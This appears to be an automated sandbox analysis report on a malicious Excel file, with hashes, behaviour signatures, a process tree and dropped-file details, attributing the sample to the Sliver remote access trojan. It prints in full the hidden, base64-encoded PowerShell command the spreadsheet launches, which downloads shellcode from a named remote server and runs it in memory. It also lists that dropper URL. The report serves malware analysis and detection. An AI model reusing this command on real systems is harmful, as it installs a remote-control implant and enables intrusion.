Analysis

  • max time kernel
    58s
  • max time network
    59s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 22:05

General

  • Target

    805984664b76d75b083fa4561dbf0f492cd19515fc9c40f1c9fdb65c9e7911a3.xls

  • Size

    46KB

  • MD5

    236f5c306176468cac13411c07e29726

  • SHA1

    181a335912f689337a35685a728993199512c37a

  • SHA256

    805984664b76d75b083fa4561dbf0f492cd19515fc9c40f1c9fdb65c9e7911a3

  • SHA512

    c8f3c023c3a2d8ed8d438aab86b9ca01ab1538fb264c8fea382ecb462b05870d0a4bbda730be86cf2ec33d61450221f4fb0fb660c164b2370c02acfc132d4cd1

  • SSDEEP

    768:G4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:1SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Sliver RAT v2 6 IoCs
  • Sliver family
  • SliverRAT

    SliverRAT is an open source Adversary Emulation Framework.

  • Blocklisted process makes network request 27 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\805984664b76d75b083fa4561dbf0f492cd19515fc9c40f1c9fdb65c9e7911a3.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rbqy3pxx\rbqy3pxx.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1356
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85AB.tmp" "c:\Users\Admin\AppData\Local\Temp\rbqy3pxx\CSC990E750EC194422EB969F9DBCF7455F.TMP"
          4⤵
            PID:1940

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES85AB.tmp

      Filesize

      1KB

      MD5

      829e5653fe663558760c7c71d6ceff75

      SHA1

      5fb2b8459032113ab6e694d8c5bd2d69463ae0cd

      SHA256

      1d4008586fe0daff59ecec7ea2ea212ed36441e29af6186413c75af2d7b369fc

      SHA512

      c9482ef08ddc2b1c25e8631f4ff0a48a85bee9e9fa151da10fa1850f1873bc0bec25d4770592927c9a0232801f38f8062d6b419857e42d49c2cf74987eaf9701

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gq2yat0.fzz.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\rbqy3pxx\rbqy3pxx.dll

      Filesize

      3KB

      MD5

      ff6e871733b3bc0206f71fb4288bd870

      SHA1

      97ca4078f6283fca7ce2472c913f380ea17f575d

      SHA256

      78e262d59eb6bcc0054971a177d22cb5c92327aa321aac86c667ae38b761c138

      SHA512

      b33de9f750c22d8f3b2f969ec018e4d5bd8eaeef970fefd93752faf33bff7217c0cf55b4c1d7a5ad8be81689f15c483e286c5d5990bc57c5b5cbf33c8390079b

    • \??\c:\Users\Admin\AppData\Local\Temp\rbqy3pxx\CSC990E750EC194422EB969F9DBCF7455F.TMP

      Filesize

      652B

      MD5

      5f6244668a7705d6e1ce327a93437bf9

      SHA1

      96d4efe14eead5e5533d9a1fd04f2a7c6de6881c

      SHA256

      ea6870be128a907ed83196f44ca60fae9c3afeec8453cf9800abd6a23d913b0a

      SHA512

      4c39e4e585ae5383bc35bee057bd728cc0cf5121d8de9007f9e3f78da7de38d036842fa8c5275d541221caa516887afd15b7ca9705088fc2d971d66ccd556b18

    • \??\c:\Users\Admin\AppData\Local\Temp\rbqy3pxx\rbqy3pxx.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\rbqy3pxx\rbqy3pxx.cmdline

      Filesize

      369B

      MD5

      eb4faf0b4a2cb7f3a320657df007c087

      SHA1

      cc702ee2d41170ae36a0821c579504fe41952d22

      SHA256

      a9273e30f9a8bca7acf9674f3be0e8af5f480c5eb17e0e7ee594a778eef666eb

      SHA512

      24902ccc82ff13a3ff6cb985685987f74db828d60f7e2204d87a889baa0ecee652fb858f7a31cbf331e40f96fae4af2b86bb39b4dac5bfe895ed5bc816b605b8

    • memory/1600-65-0x000002747C190000-0x000002747CC76000-memory.dmp

      Filesize

      10.9MB

    • memory/1600-57-0x000002747A0D0000-0x000002747A0D8000-memory.dmp

      Filesize

      32KB

    • memory/1600-63-0x000002747AC90000-0x000002747B70E000-memory.dmp

      Filesize

      10.5MB

    • memory/1600-64-0x000002747C190000-0x000002747CC76000-memory.dmp

      Filesize

      10.9MB

    • memory/1600-66-0x000002747C190000-0x000002747CC76000-memory.dmp

      Filesize

      10.9MB

    • memory/1600-67-0x000002747C190000-0x000002747CC76000-memory.dmp

      Filesize

      10.9MB

    • memory/1600-75-0x000002747C190000-0x000002747CC76000-memory.dmp

      Filesize

      10.9MB

    • memory/1600-44-0x000002747A0E0000-0x000002747A102000-memory.dmp

      Filesize

      136KB

    • memory/3664-28-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-10-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-19-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-17-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-16-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-15-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-3-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

      Filesize

      64KB

    • memory/3664-29-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-14-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-13-0x00007FFD1C0E0000-0x00007FFD1C0F0000-memory.dmp

      Filesize

      64KB

    • memory/3664-6-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-7-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-12-0x00007FFD1C0E0000-0x00007FFD1C0F0000-memory.dmp

      Filesize

      64KB

    • memory/3664-18-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-11-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-8-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-61-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-62-0x00007FFD5E3CD000-0x00007FFD5E3CE000-memory.dmp

      Filesize

      4KB

    • memory/3664-9-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-5-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

      Filesize

      64KB

    • memory/3664-4-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

      Filesize

      64KB

    • memory/3664-0-0x00007FFD5E3CD000-0x00007FFD5E3CE000-memory.dmp

      Filesize

      4KB

    • memory/3664-1-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

      Filesize

      64KB

    • memory/3664-71-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-72-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

      Filesize

      2.0MB

    • memory/3664-2-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

      Filesize

      64KB